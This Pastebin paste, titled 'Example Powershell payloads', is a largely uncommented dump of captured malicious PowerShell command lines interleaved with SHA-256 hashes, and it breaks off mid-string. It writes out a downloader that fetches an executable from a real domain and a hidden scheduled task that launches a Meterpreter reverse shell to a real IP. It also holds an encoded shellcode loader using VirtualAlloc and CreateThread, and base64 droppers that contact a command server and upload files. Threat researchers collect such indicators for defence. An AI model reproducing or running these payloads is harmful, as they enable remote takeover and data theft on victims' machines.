daily pastebin goal
33%
SHARE
TWEET

Example Powershell payloads

a guest Sep 10th, 2016 3,936 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. C:\Windows\System32\cmd.exe /c powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.Webclient).DownloadFile('http://aclawgroup.com.au/2.zip','C:\Users\User1\AppData\Roaming\WndUpdate\2.exe.zip'); (new-object -com shell.application).namespace('C:\Users\User1\AppData\Roaming\WndUpdate\').CopyHere((new-object -com shell.application).namespace('C:\Users\User1\AppData\Roaming\WndUpdate\2.exe.zip').Items(),16)
  2. 1b3e9347bafbe2e5a85f2a377d457c4b52fd404856ed5d260cd9619efd61331f
  3. 1cad7f77f76962ccfff9d0b25a0cf87d1351d9a8cdeafed417184659427f5ce3
  4. 29f930c333d3aa4bb8a81f0bb87a0f01cc2fec42920ca158270ad4f962f51d7c
  5. 2b5d4eed392f00c194c8305a3a007afe6dcff72c0f0b7697f5e157f54e50516f
  6. 32d569393336fef91c473c2743bf217e897374a255db191763b6de9a40ad7ca6
  7. 345c99969bc832bd6b7e2a12f7d5d65af9c8a3e06eb6175bf3dc9bf04f81f353
  8. 383006ae243bf62bea091cf599b451ef32f4e331e548ee7466ce664a9a4f395a
  9. 39d32398d4370e4833abfa42f1dda68449221f34c56f5dc6750288a7bef472a6
  10. 4c1826947e8dc6878b12212281d0dae7c63f25244aa161beb754dea16376967c
  11. 617bd95470f2c3d200534f4b4d1f2d49a72e5b91075ac3308e573a65a7669737
  12. 8342bd5b9523814c5774d28310e4dd193ddb6809f1b03b5afe23de0df002ba39
  13. a82745625ff27b8727b0a761ab40e7759ca8e8c6da267dc3adf54c969b4b468e
  14. a935116d2ec04f86b9c1c5b3787cee0c64aaba7d594a0e8199f01ae89549910f
  15. baca929fa67248227d20d57905778fac8320feee1c691b775c869c11aa75556c
  16. f1f34d805dd1d92373725812f05b5c83cb573d3958166655ba0d391d45f56345
  17. C:\Windows\system32\schtasks.exe  /create /TN update_google /TR "powershell.exe -ep Bypass -WindowStyle hidden -noexit -c 'IEX ((New-Object Net.WebClient).DownloadString('''''))'; Invoke-Shellcode -Payload windows/meterpreter/reverse_http -Lhost 115.70.184.41 -Lport 4445 -Force" /SC onidle /i 2
  18. 1c67973f7d76f608900db685e42831f79a892bc9c99837f748f473a0900f7579
  19. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  -enc JAAwADgAUQAgAD0AIAAnAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKABJAG4AdABQAHQAcgAgAGwAcABBAGQAZAByAGUAcwBzACwAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABmAGwAQQBsAGwAbwBjAGEAdABpAG8AbgBUAHkAcABlACwAIAB1AGkAbgB0ACAAZgBsAFAAcgBvAHQAZQBjAHQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABBAHQAdAByAGkAYgB1AHQAZQBzACwAIAB1AGkAbgB0ACAAZAB3AFMAdABhAGMAawBTAGkAegBlACwAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAUABhAHIAYQBtAGUAdABlAHIALAAgAHUAaQBuAHQAIABkAHcAQwByAGUAYQB0AGkAbwBuAEYAbABhAGcAcwAsACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAdgBjAHIAdAAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAbQBlAG0AcwBlAHQAKABJAG4AdABQAHQAcgAgAGQAZQBzAHQALAAgAHUAaQBuAHQAIABzAHIAYwAsACAAdQBpAG4AdAAgAGMAbwB1AG4AdAApADsAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkADAAOABRACAALQBOAGEAbQBlACAAIgBXAGkAbgAzADIAIgAgAC0AbgBhAG0AZQBzAHAAYQBjAGUAIABXAGkAbgAzADIARgB1AG4AYwB0AGkAbwBuAHMAIAAtAHAAYQBzAHMAdABoAHIAdQA7AFsAQgB5AHQAZQBbAF0AXQA7AFsAQgB5AHQAZQBbAF0AXQAkAHoAIAA9ACAAMAB4AGQAYQAsADAAeABjAGUALAAwAHgAYgA4ACwAMAB4ADkANwAsADAAeAAwADIALAAwAHgAZgBlACwAMAB4ADYAOAAsADAAeABkADkALAAwAHgANwA0ACwAMAB4ADIANAAsADAAeABmADQALAAwAHgANQBiACwAMAB4ADMAMQAsADAAeABjADkALAAwAHgAYgAxACwAMAB4ADcAMQAsADAAeAAzADEALAAwAHgANAAzACwAMAB4ADEANwAsADAAeAA4ADMALAAwAHgAZQBiACwAMAB4AGYAYwAsADAAeAAwADMALAAwAHgAZAA0ACwAMAB4ADEAMQAsADAAeAAxAGMALAAwAHgAOQBkACwAMAB4ADIANgAsADAAeABmAGQALAAwAHgANgA5ACwAMAB4ADUAZQAsADAAeABkADYALAAwAHgAZgBlACwAMAB4ADAAOQAsADAAeABkADYALAAwAHgAMwAzACwAMAB4AGMAZgAsADAAeAAxAGIALAAwAHgAOABjACwAMAB4ADMAMAAsADAAeAA2ADIALAAwAHgAYQBjACwAMAB4AGMANgAsADAAeAAxADQALAAwAHgAOABmACwAMAB4ADQANwAsADAAeAA4AGEALAAwAHgAOABjACwAMAB4ADAANAAsADAAeAAyADUALAAwAHgAMAAzACwAMAB4AGEAMwAsADAAeABhAGQALAAwAHgAOAAwACwAMAB4ADcANQAsADAAeAA4AGEALAAwAHgAMgBlACwAMAB4ADIANQAsADAAeABiAGEALAAwAHgANAAwACwAMAB4AGUAYwAsADAAeAAyADcALAAwAHgANAA2ACwAMAB4ADkAYQAsADAAeAAyADEALAAwAHgAOAA4ACwAMAB4ADcANwAsADAAeAA1ADUALAAwAHgAMwA0ACwAMAB4AGMAOQAsADAAeABiADAALAAwAHgAOABiACwAMAB4AGIANwAsADAAeAA5AGIALAAwAHgANgA5ACwAMAB4AGMAMAAsADAAeAA2AGEALAAwAHgAMABjACwAMAB4ADEAZAAsADAAeAA5ADQALAAwAHgAYgA2ACwAMAB4ADIAZAAsADAAeABmADEALAAwAHgAOQAzACwAMAB4ADgANwAsADAAeAA1ADUALAAwAHgANwA0ACwAMAB4ADYAMwAsADAAeAA3ADMALAAwAHgAZQBjACwAMAB4ADcANwAsADAAeABiADMALAAwAHgAMgBjACwAMAB4ADcAYgAsADAAeAAzAGYALAAwAHgAMgBiACwAMAB4ADQANgAsADAAeAAyADMALAAwAHgAZQAwACwAMAB4ADQAYQAsADAAeAA4AGIALAAwAHgAMwA3ACwAMAB4AGQAYwAsADAAeAAwADUALAAwAHgAYQAwACwAMAB4ADgAYwAsADAAeAA5ADYALAAwAHgAOQA0ACwAMAB4ADYAMAAsADAAeABkAGQALAAwAHgANQA3ACwAMAB4AGEANwAsADAAeAA0AGMALAAwAHgAYgAyACwAMAB4ADYAOQAsADAAeAAwADgALAAwAHgANAAxACwAMAB4AGMAYQAsADAAeABhAGUALAAwAHgAYQBlACwAMAB4AGIAYQAsADAAeABiADkALAAwAHgAYwA0ACwAMAB4AGMAZAAsADAAeAA0ADcALAAwAHgAYgBhACwAMAB4ADEAZQAsADAAeABhAGMALAAwAHgAOQAzACwAMAB4ADQAZgAsADAAeAA4ADMALAAwAHgAMQA2ACwAMAB4ADUANwAsADAAeABmADcALAAwAHgANgA3ACwAMAB4AGEANwAsADAAeABiADQALAAwAHgANgBlACwAMAB4AGUAMwAsADAAeABhAGIALAAwAHgANwAxACwAMAB4AGUANAAsADAAeABhAGIALAAwAHgAYQBmACwAMAB4ADgANAAsADAAeAAyADkALAAwAHgAYwAwACwAMAB4AGMAYgAsADAAeAAwAGQALAAwAHgAYwBjACwAMAB4ADAANwAsADAAeAA1AGEALAAwAHgANQA1ACwAMAB4AGUAYgAsADAAeAA4ADMALAAwAHgAMAA3ACwAMAB4ADAAZAAsADAAeAA5ADIALAAwAHgAOQAyACwAMAB4AGUAZAAsADAAeABlADAALAAwAHgAYQBiACwAMAB4AGMANQAsADAAeAA0ADkALAAwAHgANQBjACwAMAB4ADAAZQAsADAAeAA4AGQALAAwAHgANwBiACwAMAB4ADgAOQAsADAAeAAyADgALAAwAHgAYwBjACwAMAB4ADEAMwAsADAAeAAyADMALAAwAHgANQAwACwAMAB4ADkAYgAsADAAeABlADMALAAwAHgAZAAzACwAMAB4AGUAZAAsADAAeAAwAGEALAAwAHgAOABkACwAMAB4ADQAYQAsADAAeAA5AGIALAAwAHgAMgBiACwAMAB4ADAANQAsADAAeABlADUALAAwAHgAZAA3ACwAMAB4AGMANAAsADAAeAA4ADMALAAwAHgAZgAyACwAMAB4ADEAOAAsADAAeABmAGYALAAwAHgAZgBhACwAMAB4ADAAMwAsADAAeABiADEALAAwAHgANQA3ACwAMAB4AGEAYgAsADAAeABhAGMALAAwAHgANgA4ACwAMAB4ADMAMAAsADAAeAA2ADkALAAwAHgAMAA1ACwAMAB4AGUAYwAsADAAeAA2ADcALAAwAHgANwAyACwAMAB4ADcAYwAsADAAeABlADUALAAwAHgAMAA4ACwAMAB4AGQANwAsADAAeAA0AGUALAAwAHgAMwAzACwAMAB4ADkAOQAsADAAeABiADYALAAwAHgAZABhACwAMAB4AGMAMAAsADAAeAA0AGIALAAwAHgANgA5ACwAMAB4ADcAMQAsADAAeAA5ADcALAAwAHgAMwA4ACwAMAB4AGQAOQAsADAAeABlAGQALAAwAHgANAAwACwAMAB4ADMANgAsADAAeAA0ADYALAAwAHgAMgBiACwAMAB4ADkAMQAsADAAeAA5AGQALAAwAHgAOQAzACwAMAB4AGYAYgAsADAAeAAzADcALAAwAHgAMgBmACwAMAB4AGIAMQAsADAAeAA1ADYALAAwAHgAYQAwACwAMAB4ADQAZgAsADAAeAAwADcALAAwAHgAMwA3ACwAMAB4AGIANAAsADAAeAAwADIALAAwAHgAMwA1ACwAMAB4AGUANQAsADAAeABlADUALAAwAHgAZgAwACwAMAB4AGUAOQAsADAAeAA2ADEALAAwAHgAZQBkACwAMAB4AGEAMAAsADAAeAAyADcALAAwAHgANAA5ACwAMAB4ADAAZQAsADAAeAA5AGYALAAwAHgAYgBlACwAMAB4ADYAYgAsADAAeAA5AGEALAAwAHgAMwAwACwAMAB4ADkAYgAsADAAeAAxAGIALAAwAHgAZABiACwAMAB4ADAAMgAsADAAeAAxAGIALAAwAHgAZABjACwAMAB4ADUAMgAsADAAeAA4ADQALAAwAHgANwAxACwAMAB4AGQAOAAsADAAeAAzADQALAAwAHgAMgBmACwAMAB4ADkAYQAsADAAeABiADYALAAwAHgAZABjACwAMAB4AGQAYQAsADAAeABlADIALAAwAHgAYQA4ACwAMAB4ADkAYgAsADAAeABkAGEALAAwAHgAMwBmACwAMAB4AGUANQAsADAAeAA1AGMALAAwAHgANwAzACwAMAB4AGUAOAAsADAAeAA1ADEALAAwAHgAZgA0ACwAMAB4ADIAYQAsADAAeAA3AGUALAAwAHgANwAzACwAMAB4AGYAYwAsADAAeABjAGEALAAwAHgAMAA1ACwAMAB4ADcANAAsADAAeABkADUALAAwAHgANgBlACwAMAB4ADMAOQAsADAAeABmAGYALAAwAHgAZgA4ACwAMAB4ADMAYgAsADAAeABiADYALAAwAHgAOAA0ACwAMAB4ADgAZQAsADAAeABiAGMALAAwAHgAYwA4ACwAMAB4ADgANAAsADAAeAA3AGIALAAwAHgANgBkACwAMAB4ADIAMQAsADAAeAAxAGMALAAwAHgANwBiACwAMAB4ADgAZQAsADAAeABiADEALAAwAHgAZgA1ACwAMAB4AGQAMAAsADAAeAA3ADEALAAwAHgANABlACwAMAB4AGYAYQAsADAAeAAwADYALAAwAHgAZQAzACwAMAB4AGQAZgAsADAAeAA2ADEALAAwAHgAMgBjACwAMAB4ADkANwAsADAAeAA3AGEALAAwAHgAMQA5ACwAMAB4AGUAMQAsADAAeAAxADQALAAwAHgAZgAyACwAMAB4AGIANAAsADAAeAA4AGUALAAwAHgAZgA1ACwAMAB4ADkANAAsADAAeAAzADIALAAwAHgAMQBhACwAMAB4ADYAZgAsADAAeAAxAGEALAAwAHgAZAA1ACwAMAB4AGIAOQAsADAAeAAwADMALAAwAHgAZgA0ACwAMAB4ADQAYwAsADAAeAAzAGEALAAwAHgAYgA5ACwAMAB4ADAAOAAsADAAeAA2ADQALAAwAHgAZAAxACwAMAB4ADcAMAAsADAAeABjADgALAAwAHgAMgA1ACwAMAB4ADcANgAsADAAeAAxADkALAAwAHgAYwBhACwAMAB4AGIAMwAsADAAeAA3ADQALAAwAHgAOABkACwAMAB4AGEAMAAsADAAeAA0ADEALAAwAHgAMQAzACwAMAB4ADIAZgAsADAAeAA2ADMALAAwAHgAMgBlACwAMAB4ADMAOQAsADAAeABkADkALAAwAHgANQAxACwAMAB4AGUAMQAsADAAeAA0ADIALAAwAHgAZgAzACwAMAB4AGYANgAsADAAeABjAGYALAAwAHgANwBjACwAMAB4ADkAYQAsADAAeAA0ADAALAAwAHgAMgBiACwAMAB4ADcAZQAsADAAeAA0AGEALAAwAHgANwA0ACwAMAB4ADYAMAAsADAAeAAwAGQALAAwAHgAYwAwACwAMAB4ADUAMAAsADAAeAA4ADEALAAwAHgAMwBjACwAMAB4ADEAOQAsADAAeAAyAGMALAAwAHgAOQAyACwAMAB4ADYAZQAsADAAeABjADgALAAwAHgAMQBhACwAMAB4AGYAZAAsADAAeAA5AGMALAAwAHgANwBjACwAMAB4ADIAYgAsADAAeAAxAGYALAAwAHgANQBmACwAMAB4ADUANQAsADAAeABhAGUALAAwAHgAMgAwACwAMAB4AGQANAAsADAAeAA3AGIALAAwAHgAZQA4ACwAMAB4ADIANQAsADAAeABkADUALAAwAHgAZgAwACwAMAB4ADEAZQAsADAAeAA0AGMALAAwAHgAZAA2ACwAMAB4AGEAYwAsADAAeAA0AGUALAAwAHgAMQBkACwAMAB4ADkAMgAsADAAeAA2ADgALAAwAHgANgAyACwAMAB4ADQAZAAsADAAeAA0ADgALAAwAHgAMQA5ACwAMAB4ADUANwAsADAAeAAzAGEALAAwAHgAYwAwACwAMAB4ADgAMgAsADAAeAA1ADgALAAwAHgAMQAxACwAMAB4ADkAZgAsADAAeABkADkALAAwAHgAYQAyACwAMAB4ADcAMQAsADAAeAA2AGUALAAwAHgANwAyACwAMAB4AGMAMgAsADAAeAA0ADMALAAwAHgAZgA5ACwAMAB4AGYAMgAsADAAeAA0ADAALAAwAHgAYgAzACwAMAB4AGQAMwAsADAAeAA5ADcALAAwAHgANgA0ACwAMAB4ADEAYwAsADAAeABiADQALAAwAHgANQA2ACwAMAB4AGUAZgAsADAAeABjAGQALAAwAHgAYwAzACwAMAB4ADYANgAsADAAeAAzAGEALAAwAHgANwBiACwAMAB4AGMAYwAsADAAeABmADAALAAwAHgAMwA0ACwAMAB4AGMAOQAsADAAeAA2AGUALAAwAHgANQA2ACwAMAB4ADQAYgAsADAAeABlADcALAAwAHgAOAA3ACwAMAB4AGMANwAsADAAeAA0AGMALAAwAHgAZgA3ACwAMAB4AGEANwAsADAAeAA5ADYALAAwAHgAOQBjACwAMAB4ADcAOAAsADAAeAAzADYALAAwAHgAMAAwACwAMAB4AGUAMAAsADAAeAA5ADAALAAwAHgAMwA4ACwAMAB4ADMAMAAsADAAeAAxAGYALAAwAHgAOQBmACwAMAB4AGEAZQAsADAAeABiAGYALAAwAHgAYgBhACwAMAB4ADAAZAAsADAAeAA1ADgALAAwAHgAMgBiACwAMAB4ADYAYQAsADAAeABiAGQALAAwAHgAZgAxACwAMAB4AGEAYgA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAUQBXAGoAYwA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAUQBXAGoAYwAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAUQBXAGoAYwAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwA= --> $08Q = '[DllImport("kernel32.dll")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);[DllImport("kernel32.dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("msvcrt.dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);';$w = Add-Type -memberDefinition $08Q -Name "Win32" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z = 0xda,0xce,0xb8,0x97,0x02,0xfe,0x68,0xd9,0x74,0x24,0xf4,0x5b,0x31,0xc9,0xb1,0x71,0x31,0x43,0x17,0x83,0xeb,0xfc,0x03,0xd4,0x11,0x1c,0x9d,0x26,0xfd,0x69,0x5e,0xd6,0xfe,0x09,0xd6,0x33,0xcf,0x1b,0x8c,0x30,0x62,0xac,0xc6,0x14,0x8f,0x47,0x8a,0x8c,0x04,0x25,0x03,0xa3,0xad,0x80,0x75,0x8a,0x2e,0x25,0xba,0x40,0xec,0x27,0x46,0x9a,0x21,0x88,0x77,0x55,0x34,0xc9,0xb0,0x8b,0xb7,0x9b,0x69,0xc0,0x6a,0x0c,0x1d,0x94,0xb6,0x2d,0xf1,0x93,0x87,0x55,0x74,0x63,0x73,0xec,0x77,0xb3,0x2c,0x7b,0x3f,0x2b,0x46,0x23,0xe0,0x4a,0x8b,0x37,0xdc,0x05,0xa0,0x8c,0x96,0x94,0x60,0xdd,0x57,0xa7,0x4c,0xb2,0x69,0x08,0x41,0xca,0xae,0xae,0xba,0xb9,0xc4,0xcd,0x47,0xba,0x1e,0xac,0x93,0x4f,0x83,0x16,0x57,0xf7,0x67,0xa7,0xb4,0x6e,0xe3,0xab,0x71,0xe4,0xab,0xaf,0x84,0x29,0xc0,0xcb,0x0d,0xcc,0x07,0x5a,0x55,0xeb,0x83,0x07,0x0d,0x92,0x92,0xed,0xe0,0xab,0xc5,0x49,0x5c,0x0e,0x8d,0x7b,0x89,0x28,0xcc,0x13,0x23,0x50,0x9b,0xe3,0xd3,0xed,0x0a,0x8d,0x4a,0x9b,0x2b,0x05,0xe5,0xd7,0xc4,0x83,0xf2,0x18,0xff,0xfa,0x03,0xb1,0x57,0xab,0xac,0x68,0x30,0x69,0x05,0xec,0x67,0x72,0x7c,0xe5,0x08,0xd7,0x4e,0x33,0x99,0xb6,0xda,0xc0,0x4b,0x69,0x71,0x97,0x38,0xd9,0xed,0x40,0x36,0x46,0x2b,0x91,0x9d,0x93,0xfb,0x37,0x2f,0xb1,0x56,0xa0,0x4f,0x07,0x37,0xb4,0x02,0x35,0xe5,0xe5,0xf0,0xe9,0x61,0xed,0xa0,0x27,0x49,0x0e,0x9f,0xbe,0x6b,0x9a,0x30,0x9b,0x1b,0xdb,0x02,0x1b,0xdc,0x52,0x84,0x71,0xd8,0x34,0x2f,0x9a,0xb6,0xdc,0xda,0xe2,0xa8,0x9b,0xda,0x3f,0xe5,0x5c,0x73,0xe8,0x51,0xf4,0x2a,0x7e,0x73,0xfc,0xca,0x05,0x74,0xd5,0x6e,0x39,0xff,0xf8,0x3b,0xb6,0x84,0x8e,0xbc,0xc8,0x84,0x7b,0x6d,0x21,0x1c,0x7b,0x8e,0xb1,0xf5,0xd0,0x71,0x4e,0xfa,0x06,0xe3,0xdf,0x61,0x2c,0x97,0x7a,0x19,0xe1,0x14,0xf2,0xb4,0x8e,0xf5,0x94,0x32,0x1a,0x6f,0x1a,0xd5,0xb9,0x03,0xf4,0x4c,0x3a,0xb9,0x08,0x64,0xd1,0x70,0xc8,0x25,0x76,0x19,0xca,0xb3,0x74,0x8d,0xa0,0x41,0x13,0x2f,0x63,0x2e,0x39,0xd9,0x51,0xe1,0x42,0xf3,0xf6,0xcf,0x7c,0x9a,0x40,0x2b,0x7e,0x4a,0x74,0x60,0x0d,0xc0,0x50,0x81,0x3c,0x19,0x2c,0x92,0x6e,0xc8,0x1a,0xfd,0x9c,0x7c,0x2b,0x1f,0x5f,0x55,0xae,0x20,0xd4,0x7b,0xe8,0x25,0xd5,0xf0,0x1e,0x4c,0xd6,0xac,0x4e,0x1d,0x92,0x68,0x62,0x4d,0x48,0x19,0x57,0x3a,0xc0,0x82,0x58,0x11,0x9f,0xd9,0xa2,0x71,0x6e,0x72,0xc2,0x43,0xf9,0xf2,0x40,0xb3,0xd3,0x97,0x64,0x1c,0xb4,0x56,0xef,0xcd,0xc3,0x66,0x3a,0x7b,0xcc,0xf0,0x34,0xc9,0x6e,0x56,0x4b,0xe7,0x87,0xc7,0x4c,0xf7,0xa7,0x96,0x9c,0x78,0x36,0x00,0xe0,0x90,0x38,0x30,0x1f,0x9f,0xae,0xbf,0xba,0x0d,0x58,0x2b,0x6a,0xbd,0xf1,0xab;$g = 0x1000;if ($z.Length -gt 0x1000){$g = $z.Length};$QWjc=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($QWjc.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$QWjc,0,0,0);for (;;){Start-sleep 60};
  20. a933fc234397ed08151cd7578ee649db47e9a4585b572b5a9185fef34444beb7
  21. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "  &{$rn = Get-Random -minimum 1 -maximum 10000; $id = 'AZHOSTNAME4-WIN81' + $rn; $f=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('DQpTZXQgd3NzID0gQ3JlYXRlT2JqZWN0KCJ3U2NyaXB0LlNoZWxsIikNCg0KSE9NRSA9IENyZWF0ZU9iamVjdCgiU2NyaXB0aW5nLkZpbGVTeXN0ZW1PYmplY3QiKS5HZXRQYXJlbnRGb2xkZXJOYW1lKFdTY3JpcHQuU2NyaXB0RnVsbE5hbWUpICYgIlwiICciJXVzZXJwcm9maWxlJVxBcHBEYXRhXExvY2FsXE1pY3Jvc29mdFxNZWRpYVwiDQpTRVJWRVI9Imh0dHA6Ly8xNzguMzMuOTQuNDc6MjA1MC91cGRhdGUucGhwP3JlcT1fXyINCg0KRHduPSAicG93ZXJzaGVsbCAiIiAiICYgXw0KICAgICAiICZ7JHdjPShuZXctb2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KTsgIiAmIF8gDQogICAgICJ3aGlsZSgxKXt0cnl7JHI9R2V0LVJhbmRvbSA7JHdjLkRvd25sb2FkRmlsZSgnIiBfDQogICAgICYgU0VSVkVSICYgXw0KICAgICAiJm09ZCcsJyIgJiBIT01FICYgImRuXCcrJHIrJy4tXycpOyIgJiBfDQogICAgICIgUmVuYW1lLUl0ZW0gLXBhdGggKCciICAmIF8NCiAgICAgIEhPTUUgJiBfDQogICAgICAiZG5cJyskcisnLi1fJykgLW5ld25hbWUgIiAmIF8gDQogICAgICAiKCR3Yy5SZXNwb25zZUhlYWRlcnNbJ0NvbnRlbnQtRGlzcG9zaXRpb24nXS5TdWJzdHJpbmcoIiAmIF8NCiAgICAgICIkd2MuUmVzcG9uc2VIZWFkZXJzWydDb250ZW50LURpc3Bvc2l0aW9uJ10uSW5kZXhvZignZmlsZW5hbWU9JykrOSkpfWNhdGNoe2JyZWFrfX19IiIiDQoNCg0Kd3NzLlJ1biBSZXBsYWNlKER3biwiLV8iLCJkd24iKSwwDQoNCkRvd25sb2FkRXhlY3V0ZT0gInBvd2Vyc2hlbGwgIiIgIiAmIF8NCiAgICAgICAgICAgICAgICAgIiZ7JHI9R2V0LVJhbmRvbTsgIiYgXw0KICAgICAgICAgICAgICAgICAiJHdjPShuZXctb2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50KTsiICYgXyANCiAgICAgICAgICAgICAgICAgIiR3Yy5Eb3dubG9hZEZpbGUoJyIgJiBTRVJWRVIgJiAiJm09YicsJyIgJiBIT01FJiJkblwnKyRyKycuLV8nKTsiICYgXw0KICAgICAgICAgICAgICAgICAiSW52b2tlLUV4cHJlc3Npb24gKCciJiBIT01FJiJkblwnKyRyKycuLV8gPiIgJiBIT01FJiJ1cFwnKyRyKyctXycpOyIgJiBfDQogICAgICAgICAgICAgICAgICJSZW5hbWUtSXRlbSAtcGF0aCAoJyIgJiBIT01FICYgXw0KICAgICAgICAgICAgICAgICAidXBcJyskcisnLV8nKSAtbmV3bmFtZSAoJHdjLlJlc3BvbnNlSGVhZGVyc1snQ29udGVudC1EaXNwb3NpdGlvbiddLlN1YnN0cmluZygiICYgXyANCiAgICAgICAgICAgICAgICAgIiR3Yy5SZXNwb25zZUhlYWRlcnNbJ0NvbnRlbnQtRGlzcG9zaXRpb24nXS5JbmRleG9mKCdmaWxlbmFtZT0nKSs5KSsnLnR4dCcpOyIgJiBfDQogICAgICAgICAgICAgICAgICJHZXQtQ2hpbGRJdGVtICIgJiBIT01FICYgInVwXCB8IEZvckVhY2gtT2JqZWN0ICImIF8NCiAgICAgICAgICAgICAgICAgIntpZigoR2V0LUl0ZW0oJF8uRnVsbE5hbWUpKS5sZW5ndGggLWd0IDApeyR3Yy5VcGxvYWRGaWxlKCciICYgXw0KICAgICAgICAgICAgICAgICBTRVJWRVIgJiBfDQogICAgICAgICAgICAgICAgICImbT11JywkXy5GdWxsTmFtZSl9OyIgJiBfDQogICAgICAgICAgICAgICAgICJSZW1vdmUtSXRlbSAkXy5GdWxsTmFtZX07UmVtb3ZlLUl0ZW0gKCciJiBIT01FICYgImRuXCcrJHIrJy4tXycpfSIiIg0KDQoNCndzcy5SdW4gUmVwbGFjZShEb3dubG9hZEV4ZWN1dGUsIi1fIiwiYmF0IiksMA0KDQpkbnNDbWQgPSAicG93ZXJzaGVsbCAtZXhlY3V0aW9ucG9saWN5IGJ5cGFzcyAtZmlsZSAiICYgSE9NRSAmICJkbi5wczEiDQoNCndzcy5SdW4gZG5zQ21kLDA=')); Add-Content 'C:\Users\User1\AppData\Local\Microsoft\Media\upd.vbs' $f; (Get-Content 'C:\Users\User1\AppData\Local\Microsoft\Media\upd.vbs') -replace '__',('HTP'+$id) |  Set-Content  'C:\Users\User1\AppData\Local\Microsoft\Media\upd.vbs' ; $fdn=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('JHNjcmlwdGRpciA9IFNwbGl0LVBhdGggLVBhcmVudCAtUGF0aCAkTXlJbnZvY2F0aW9uLk15Q29tbWFuZC5EZWZpbml0aW9uDQokZ2xvYmFsOmRGb2xkID0gJHNjcmlwdGRpciArICJcZG4iDQokZ2xvYmFsOnVGb2xkID0gJHNjcmlwdGRpciArICJcdXAiDQokaWQgPSAiX18iDQokbWF4aG9zdGxlbmd0aCA9IDQwOw0KJGdsb2JhbDpob3N0bmFtZSA9ICJkbnNyZWNvcmRzb2x2ZXIudGsiDQoNCmlmIChAKEdldC1XbWlPYmplY3QgV2luMzJfUHJvY2VzcyAtRmlsdGVyICJOYW1lPSdwb3dlcnNoZWxsLmV4ZScgQU5EIENvbW1hbmRMaW5lIExJS0UgJyVkbi5wczElJyIpLmNvdW50IC1ndCAxKXsgICAgDQogICAgZXhpdA0KfQ0KZWxzZXsNCiAgICAiT25seSBvbmUgaW5zdGFuY2UgaXMgcnVubmluZyIgICAgICAgDQp9DQoNCmlmKC1ub3QoVGVzdC1QYXRoIC1QYXRoICgkZ2xvYmFsOnVGb2xkKSkpew0KICAgIG1rZGlyICRnbG9iYWw6dUZvbGQNCn0NCmlmKC1ub3QgKFRlc3QtUGF0aCAtUGF0aCAoJGdsb2JhbDpkRm9sZCkpKXsNCiAgICBta2RpciAkZ2xvYmFsOmRGb2xkDQp9DQoNCmlmKC1ub3QoVGVzdC1QYXRoIC1QYXRoICgkZ2xvYmFsOnVGb2xkKSkpew0KICAgIG1rZGlyICRnbG9iYWw6dUZvbGQNCn0NCiM9PT09PT09PT09PT09PT0gZG93bmxvYWQgcmVndWxhciBmaWxlcyA9PT09PT09PT09PT09PT09PT0NCiAgICAjPT09PT09PT09PT0gZXhpc3RlbmNlIHJlZ3VsYXIgZmlsZSA9PT09PT09PT09PT09PT09PT0gICAgICAgDQog